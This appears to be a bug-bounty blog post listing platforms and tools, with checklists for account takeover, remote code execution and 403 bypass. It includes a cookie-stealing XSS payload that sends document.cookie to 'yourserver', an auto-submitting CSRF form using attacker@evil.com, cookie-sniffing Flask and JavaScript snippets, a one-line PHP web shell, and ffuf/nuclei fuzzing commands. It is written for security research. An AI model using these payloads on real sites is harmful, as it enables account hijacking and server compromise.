Bugbounty Resources and Tools

Bug bounty programs are a great way to earn money by finding and reporting security vulnerabilities in web applications and software. If you're interested in bug bounty hunting and security research, there are a number of resources and tools that can help you get started. In this article, we'll explore some of the best bug bounty resources and tools that you can use to enhance your skills and find more bugs.

Bug Bounty Platforms

There are several bug bounty platforms that host bug bounty programs from various companies. These platforms provide a marketplace for security researchers to find and report vulnerabilities in exchange for rewards. Some of the popular bug bounty platforms include:

1. HackerOne: HackerOne is one of the largest bug bounty platforms, hosting programs from companies like Google, Microsoft, and PayPal.

Bug Bounty Tools

In addition to bug bounty platforms, there are several tools that can help you find and report security vulnerabilities. Some of the popular bug bounty tools include:

1. Burp Suite: Burp Suite is a web application security testing tool that can help you find vulnerabilities like SQL injection, cross-site scripting, and more.

Bug Bounty Communities

Bug bounty communities are a great way to connect with other security researchers, share knowledge, and learn from each other. Some of the popular bug bounty communities include:

1. Bugcrowd Forum: The Bugcrowd Forum is a community of security researchers who share tips, tricks, and resources for bug bounty hunting.

Bug Bounty Resources

Account Takeover Checklist

• login:
  • check if you are able to brute force the password
  • Test for OAuth misconfigurations
  • check if you are able to bruteforce the login OTP
  • check for JWT mesconfigurations
  • Test for SQL injection to bypass authentication. admin" or 1=1;--
  • check if the application validates the OTP or Token
• password reset:
  • check if you are able to brute force the password reset OTP.
  • test for token predectability.
  • test for JWT misconfigurations.
  • check if the password reset endpoint is vulnerable to IDOR.
  • check if the password reset endpoint is vulnerable to Host Header injection.
  • check if the password reset endpoint is leaking the token or OTP in the HTTP response.
  • check if the application validates the OTP or Token.
  • test for HTTP parameter Pollution (HPP).
• XSS to Account Takeover:
  • if the application does not use auth token or you can't access the cookies because the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password
  • try to exfiltrate the cookies
  • try to exfiltrate the Auth Token
  • if the cookie's "domain" attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies PoC Example:

<script>
  /*
  this script will create a hidden <img> element
  when the browser tries to load the image the victim's cookies
  will be sent to your server
  */
  var new_img = document.createElement('img');
  new_img.src = "http://yourserver/" + document.cookie;
  new_img.style = 'display: none;'
  document.body.appendChild(new_img);
</script>

• CSRF to Account Takeover:
  • check if the email update endpoint is vulnerable to CSRF
  • check if the password update endpoint is vulnerable to CSRF
  • PoC Example:

<html>
  <head>
    <title>CSRF PoC</title>
  </head>
  <body>
      <form name='attack' action='https://example.com/update-email' method='POST'>
           <input type="hidden" name="new_email" value="attacker@evil.com">
           <input type="submit" name="submit" value="submit" hidden>
      </form>
      <script>
           document.attack.submit.click()
      </script>
  </body>
  </html>

• IDOR to Account Takerover
  • checck if the email update endpoint is vulnerable to IDOR
  • check if the password change endpoint is vulnerable to IDOR
  • check if the password reset endpoint vulnerable to IDOR
• subdomain takeover:
  • first-order: check if you can takeover xyz.example.com, you can host any malicious code to steal users info or cookies
  • PoC Example

#python
#!/usr/bin/python3
from flask import *
app = Flask(__name__)
@app.route('/')
def cookie_sniffer():
    for c_name, c_value in request.cookies.items():
        print(c_name + ': ' + c_value)
    return 'Hello, world'
if __name__ == '__main__':
    app.run(port= showLineNumbers80)

• second-order (broken link hijacking): if you found a broken link in a webpage (https://nonexistentlink.com/app.js) and you can takeover this domain, you can host any malicious javascript file and use it to steal users info or cookies
• PoC Example

//javascript
  user_cookies = {
    "cookies": document.cookie
}
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "/store-cookies", true);
xhttp.send(JSON.stringify(user_cookies));

Remote Code/Command Execution (RCE) Checklist

• Server Side Request Forgery (SSRF) to RCE:
  • if you found an SSRF try to escalate it to RCE by interacting with internal services, to do this you can craft a Gopher payload to interact with services like MySQL, you can use Gopherus
• File Upload to RCE:
  • if you found an unrestricted file upload vulnerability try to upload a malicious file to get a reverse shell.
  • PoC Example:

#php
<?php system($_GET["cmd"]);?>

• Dependency Confusion Attack:
  • Search for packages that may be used internally by your target, then register a malicious public package with the same name, you can use confused tool.
• Server Side Template Injection (SSTI) to RCE:
  • if you found and SSTI you can exploit it with tplmap to get an RCE
• SQL Injection To RCE:
  • if you found an SQL injection, you can craft a special query to write an arbitrary file on the system,SQL Injection shell.
• Latex Injection To RCE:
  • if you found a web-based Latex Compiler, test If it is vulnerable to RCE, Latex to command execution.
• Local File Inclusion (LFI) to RCE:
  • if you found an LFI try to escalate it to RCE via these methods and you can automate the process using [liffy](and you can automate the process using)
• Insecure deserialization to RCE:
  • check if the application is vulnerable to Insecure deserialization
  • how to identify if the app is vulnerable:
    • try to find out the language used to build the application.
    • learn about the methods used to serialize and deserialize data in this language.
    • by analyzing the data that comes from the application you can identify the method.
    • try to craft a special payload to get and RCE
  • check this cheatsheet
  • Java Deserialization Scanner : a Burp Suite plugin to detect and exploit Java deserialization vulnerabilities.

Web Applications Fingerprinting tools

• wappaylzer
  • you can use wappaylyzer extension for firefox or chrome browsers for web apps fingerprinting.
• builtwith
  • you can use builtwith extension for firefox or chrome browsers for web apps fingerprinting.
• httpx
  • you can use -web-server and -tech-detect options

#bash
# a single domain
echo example.com | httpx -web-server -tech-detect
 
# a list of subdomins
cat subdomains_list.txt | httpx -web-server -tech-detect
 
httpx -l subdomains_list.txt -web-server -tech-detect

• Aquatone
  • Aquatoneis a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.

#bash
cat hosts.txt | aquatone

• nuclei
  • nuclei project has a good list of templates to fingerprint web apps.

#bash
nuclei -t ~/nuclei-templates -tags tech -u https://example.com -c 200

• whatweb
  • has an 1800 plugin to identify technologies, you can use it to fingerprint web apps

#bash
# a single host
whatweb example.com
 
# a list of hosts
whatweb --input-file=hosts.txt

• Error messages
  • you can identify technologies via error messages, if a web app does not handle errors, and you sent malformed data to the web app, this data will cause an error, and this error may reveal the back-end technology.

#http
POST / HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*
Content-type: application/json
Content-Length: 8
 
{"test":d

you can enumerate the web app endpoints and start fuzzing them with different http methods, http headers, and body

• fuzzing http methods

#http
METHOD /ENDPOINT HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*

#bash
ffuf -w http_methods.txt:METHOD -w endpoints.txt:ENDPOINT -request http_request.txt

• fuzzing http headers

#http
GET /ENDPOINT HTTP/1.1
Host: example.com
User-Agent: curl/7.74.0
Accept: */*

#bash
ffuf -w http_headers_names.txt:NAME -w http_headers_values.txt:VALUE -w endpoints.txt:ENDPOINT -request http_request.txt  -H "NAME: VALUE"

403 - Bypass

• FFUF
  • Path fuzzing

#bash
ffuf -w 403_url_payloads.txt -u http://example.com/auth_pathFUZZ -fc 403,401,400

• HTTP Header Fuzzing

#bash
ffuf -w 403_bypass_header_names.txt:HEADER -w 403_bypass_header_values.txt:VALUE -u http://example.com/auth_path -H "HEADER:VALUE" -fc 403,401,400

• Common HTTP Ports Fuzzing

#bash
ffuf -w common-http-ports.txt:PORT -u http://example.com/auth_path -H "Host: example.com:PORT" -fc 403,401,400

• HTTP Methods Fuzzing

#bash
ffuf -w http-methods.txt:METHOD -u http://example.com/auth_path -X "METHOD" -fc 403,401,400

• User Agent Fuzzing

#bash
ffuf -w user-agents.txt:AGENT -u http://example.com/auth_path -H "User-Agent: AGENT" -fc 403,401,400

nuclei

#bash
nuclei -u http://example.com/auth_path/ -t 403-bypass-nuclei-templates -tags fuzz -timeout 10 -c 200 -v

Note : Add the slash symbol after the path whether it is a directory or file

Example:

• http://example.com/directory/
• http://example.com/directory/file.ext/

Source:

• Presentation file, click here to see
• 403 Header payloads.
• 403 URL payloads
• iamthefrogy/frogy/ports
• http methods
• User-Agents fuzz.txt

Thanks for reading this post, if you like my work you can support by Become a Patron! Read other posts